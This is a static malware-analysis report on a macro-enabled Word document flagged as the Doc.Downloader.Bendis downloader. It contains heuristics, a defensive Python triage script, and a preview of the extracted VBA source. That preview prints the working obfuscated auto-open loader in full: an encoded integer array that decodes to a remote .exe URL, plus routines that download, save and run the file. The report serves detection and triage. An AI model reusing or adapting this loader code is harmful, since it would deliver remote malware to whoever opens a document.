Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is an OOXML Word document whose word/vbaProject.bin carries an obfuscated VBA downloader. Sub autoopen() in ThisDocument calls CenterByMan, and from there the live path runs CheckBins, crentips, KeepBlyading, product, OnasOn and SaveMaps; every one of these routines is padded with unreachable dictionary/array helper code and GoTo jumps that skip the filler. No ProgID, method name or URL appears as a literal in the macro: CenterByMan builds the hubabuba() string table by splitting UserForm1.Label1.Caption on "/" (the caption lives in the form stream and is not part of the extracted source), and the download URL is stored in CheckBins as a "|"-separated array of integers that crentips decodes with Chr(CInt(n) - 1000). Decoded statically from the array on this page, that string is hxxp://designis[.]com[.]ua/admin/images/87h754.exe (defanged here). crentips passes it to fishkinet_1.Open hubabuba(5), <url>, False and KeepBlyading calls fishkinet_1.Send, so fishkinet_1 is an HTTP request object. SaveMaps reads the response with CallByName(fishkinet_1, hubabuba(10), VbGet), writes it into fishkinet_2 (whose property hubabuba(7) OnasOn set to 1 before opening it) and saves it with CallByName fishkinet_2, hubabuba(11), VbMethod, fishkinet_5, 2 to a path assembled from an environment variable (fishkinet_3(hubabuba(6)), where fishkinet_3 is husbanD.Environment(hubabuba(4))) plus the suffix hubabuba(12). Finally fishkinet_6.Open(fishkinet_5) hands the saved file to the execution object. The CreateObject and CallByName sinks that the heuristics match are therefore fed entirely from the form caption, which is why the source itself contains no recognisable indicator. The ClamAV signature Doc.Downloader.Bendis-6680540-0 agrees with this downloader shape.
Heuristics (8)

- ClamAV: Doc.Downloader.Bendis-6680540-0 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Downloader.Bendis-6680540-0.
- VBA project inside OOXML [medium, OOXML_VBA, 5 related findings]
  Document contains a VBA project (VBA macros present).
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder is the numeric char-array variant (Chr(CInt(n) - 1000) in crentips) and the ProgIDs and member names come from a form-control caption split on "/".
  Matched line in script: Set fishkinet_1 = CreateObject(hubabuba(0))
- CreateObject call [high, OLE_VBA_CREATEOBJ]
  Matched line in script: Set fishkinet_1 = CreateObject(hubabuba(0))
- CallByName call [high, OLE_VBA_CALLBYNAME]
  Matched line in script: rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]
  Matched line in script: Sub autoopen()
- Embedded URL [info, EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All twelve URLs listed here are XML namespace identifiers from the OOXML parts, typical of any Word-generated .docx/.docm, and none of them is a network indicator; the macro's actual download URL is absent from this list because it exists only as an encoded integer array.
  In document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
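As an added triage example (not analyzer output and not code from the sample), the following Python script encodes the loader shape that the summary and the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic describe and replays the sample's own decoder statically. It runs on a constructed excerpt of the extracted macros.bas (lines copied from the preview further down) and on a constructed benign control macro. It assumes the decoder is the numeric-array variant with a single subtraction offset and a "|" separator; the regex names, the TriageResult fields and the loader_shape rule are this example's own, not the analyzer's.

```python
"""Static triage of the obfuscated auto-exec loader shape (added example).

Scans decoded VBA source for an auto-exec entry point, CreateObject/CallByName
sinks fed from an array element, a string table split out of a form Caption and
a Chr(CInt(n) - N) decoder over a "|"-joined integer array, then replays the
decoder so the hidden string is recovered without executing the macro.
"""
import re
from dataclasses import dataclass, field

AUTOEXEC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?Sub\s+"
    r"(autoopen|auto_open|document_open|workbook_open|autoexec)\b", re.I | re.M)
# CreateObject(arr(0)) / CallByName(obj, arr(10), ...): ProgID or member name
# taken from an array element instead of a literal (the shape the heuristic flags)
ARRAY_FED_SINK_RE = re.compile(
    r"\b(CreateObject|CallByName)\b\s*\(?\s*(?:\w+\s*,\s*)?(\w+)\((\d+)\)", re.I)
# arr = Split(UserForm1.Label1.Caption, "/"): string table hidden in a form control
CAPTION_TABLE_RE = re.compile(r"(\w+)\s*=\s*Split\(\s*(\w+(?:\.\w+)*\.Caption)\s*,", re.I)
# Chr(CInt(<expr>) - 1000), allowing one level of parentheses inside <expr>
CHR_OFFSET_RE = re.compile(r"Chr\(\s*CInt\((?:[^()]|\([^()]*\))*\)\s*-\s*(\d+)\s*\)", re.I)
# Split("1104|1116|...", "|"): the integer array the decoder consumes
SPLIT_DIGITS_RE = re.compile(r'Split\(\s*"(\d+(?:\|\d+)+)"\s*,\s*"\|"\s*\)', re.I)


@dataclass
class TriageResult:
    autoexec: list = field(default_factory=list)         # entry-point names
    caption_tables: list = field(default_factory=list)   # (array, control.Caption)
    array_fed_sinks: list = field(default_factory=list)  # (sink, array, index)
    decoded_strings: list = field(default_factory=list)

    @property
    def loader_shape(self) -> bool:
        """Entry point + array-fed sink + working decoder, all in one source."""
        return bool(self.autoexec and self.array_fed_sinks and self.decoded_strings)


def join_continuations(src: str) -> str:
    """Fold VBA ' _' line continuations so a Split(...) spread over two lines is one."""
    return re.sub(r"[ \t]+_\r?\n[ \t]*", " ", src)


def decode_offset_array(tokens: str, offset: int, sep: str = "|") -> str:
    """Replay crentips(): Chr(CInt(t) - offset) for every token."""
    chars = []
    for t in tokens.split(sep):
        v = int(t) - offset
        if not 0 <= v <= 0xFFFF:
            raise ValueError(f"token {t} is not a character with offset {offset}")
        chars.append(chr(v))
    return "".join(chars)


def triage(vba_source: str) -> TriageResult:
    src = join_continuations(vba_source)
    r = TriageResult()
    r.autoexec = [m.group(1) for m in AUTOEXEC_RE.finditer(src)]
    r.caption_tables = [(m.group(1), m.group(2)) for m in CAPTION_TABLE_RE.finditer(src)]
    r.array_fed_sinks = [(m.group(1), m.group(2), int(m.group(3)))
                         for m in ARRAY_FED_SINK_RE.finditer(src)]
    offsets = sorted({int(m.group(1)) for m in CHR_OFFSET_RE.finditer(src)})
    for m in SPLIT_DIGITS_RE.finditer(src):
        for off in offsets:  # try each offset the source uses; skip non-characters
            try:
                r.decoded_strings.append(decode_offset_array(m.group(1), off))
            except ValueError:
                continue
    return r


# Constructed excerpt: lines copied from the extracted macros.bas on this page.
SAMPLE_VBA = '''Sub autoopen()
Call CenterByMan
End Sub
Public Sub CenterByMan()
hubabuba = Split(UserForm1.Label1.Caption, "/")
Set fishkinet_1 = CreateObject(hubabuba(0))
End Sub
Public Sub SaveMaps()
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
CallByName fishkinet_2, hubabuba(9), VbMethod, rbp
CallByName fishkinet_2, hubabuba(11), VbMethod, fishkinet_5, 2
End Sub
Public Function crentips(nY As Integer) As String
For fishkinet_8 = LBound(fishkinet_7) To UBound(fishkinet_7)
fishkinet3_1 = fishkinet3_1 & Chr(CInt(fishkinet_7(fishkinet_8)) - 1000)
Next fishkinet_8
fishkinet_1.Open hubabuba(5), fishkinet3_1, False
End Function
Public Sub CheckBins()
fishkinet_7 = Split("1104|1116|1116|1112|1058|1047|1047|1100|1101|1115|1105|1103|1110|1105|1115|1046|1099|1111|1109|1046|1117|1097|1047|1097|1100|1109|1105|1110|1047|1105|1109|1097|1103|1101|1115|1047|1056|1055|1104|1055|1053|1052|1046|1101|1120|1101", _
"|")
Set fishkinet_2 = CreateObject(hubabuba(1))
End Sub
'''

# Constructed benign control: auto-exec plus a literal-ProgID CreateObject only.
BENIGN_VBA = '''Sub AutoOpen()
Set fso = CreateObject("Scripting.FileSystemObject")
End Sub
'''
```

Run it on any olevba-decoded source. On the excerpt it reports the autoopen entry point, the hubabuba table sourced from UserForm1.Label1.Caption, five array-fed CreateObject/CallByName sinks and exactly one decoded string, the download URL from the CheckBins array. The hubabuba indices themselves cannot be resolved from this page because the caption is not in the extracted text, so the script records only that the sinks are array-fed; recovering the ProgIDs needs the form stream inside vbaProject.bin. The loader_shape rule deliberately requires the decoder as well as the sinks, so the benign control (an auto-exec macro instantiating a literal ProgID) does not fire.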
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15746 bytes | a500579203bede3a60b85d9aecd59a611b7ca794b92dab151ba4c4d009513b49 |

Preview of macros.bas (first 1,000 lines of the extracted script). Module boundaries are the Attribute VB_Name lines: ThisDocument holds only the autoopen entry point, UserForm1 is the form whose Label1 caption supplies the string table, and Module1 to Module4 interleave the loader routines with dictionary/array helper code (the pDict, Me.dict, Dicts and Application.Evaluate references) that the live path never reaches.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call CenterByMan
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{09086845-7A86-431E-ADD5-7DC6B76003CD}{07762A1E-E82C-4003-865A-EFD094B7EE4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public fishkinet_1 As Object
Public fishkinet_2 As Object
Public fishkinet_3 As Object
Public fishkinet_7() As String
Public fishkinet_4 As String
Public fishkinet_5 As String
Public fishkinet_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set fishkinet_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName fishkinet_2, hubabuba(9), VbMethod, rbp
CallByName fishkinet_2, hubabuba(11), VbMethod, fishkinet_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
fishkinet_6.Open (fishkinet_5)
End Sub
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
fishkinet_5 = fishkinet_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
fishkinet_5 = fishkinet_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName fishkinet_2, hubabuba(7), VbLet, 1
fishkinet_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
fishkinet_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
fishkinet_4 = fishkinet_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim fishkinet_8 As Integer
Dim fishkinet3_1 As String
fishkinet3_1 = ""
GoTo s2
s2:
For fishkinet_8 = LBound(fishkinet_7) To UBound(fishkinet_7)
fishkinet3_1 = fishkinet3_1 & Chr(CInt(fishkinet_7(fishkinet_8)) - 1000)
Next fishkinet_8
GoTo SIDR4
SIDR4:
fishkinet_1.Open hubabuba(5), fishkinet3_1, False
KeepBlyading
End Function
'''''''''''''''''''
'@param operation is the string to be converted, placeholder is {*} by default
'
'''''''''''''''''''
Public Function productX(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, tmp))
Next k
Else
For Each k In pDict.Keys
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, pDict(k) & ""))
Next k
End If
Set productX = res
End Function
Public Function clone() As Variant
Dim res As Variant
Set res = clone__(Me, pLevel)
With res
.appendMode = pIsDictFilled
.reversedMode = pReversedMode
If pStrictMode Then
.strictMode = True
.strictModeReg = pStrictModeReg
End If
End With
Set clone = res
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
fishkinet_7 = Split("1104|1116|1116|1112|1058|1047|1047|1100|1101|1115|1105|1103|1110|1105|1115|1046|1099|1111|1109|1046|1117|1097|1047|1097|1100|1109|1105|1110|1047|1105|1109|1097|1103|1101|1115|1047|1056|1055|1104|1055|1053|1052|1046|1101|1120|1101", _
"|")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set fishkinet_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set fishkinet_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set fishkinet_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module4"
Public Function IsReg(testObj As Object) As Boolean
On Error GoTo errhandler3
Dim a As Boolean
a = testObj.test("")
errhandler3:
If Err.Number = 0 Then
IsReg = True
Else
IsReg = False
End If
End Function
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
' ________________________________________Util Functions____________________________________________
Public Function reg(ByVal pattern As String, Optional ByVal flag As String) As Object
Dim obj As Object
Set obj = CreateObject("vbscript.regexp")
obj.pattern = pattern
If IsMissing(flag) Then
obj.IgnoreCase = True
Else
' "gi"
If InStr(StrConv(flag, vbLowerCase), "g") > 0 Then
obj.Global = True
End If
' i by default to true
If InStr(StrConv(flag, vbLowerCase), "i") > 0 Then
obj.IgnoreCase = False
End If
End If
Set reg = obj
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 62976 bytes | 6a6e4cd5b419097b51e9b17b6911d37345a5d3ec7682f7f6c334fc7dc80594c8 |
Detection
ClamAV: Doc.Downloader.Bendis-6680540-0
Obfuscation or payload: unlikely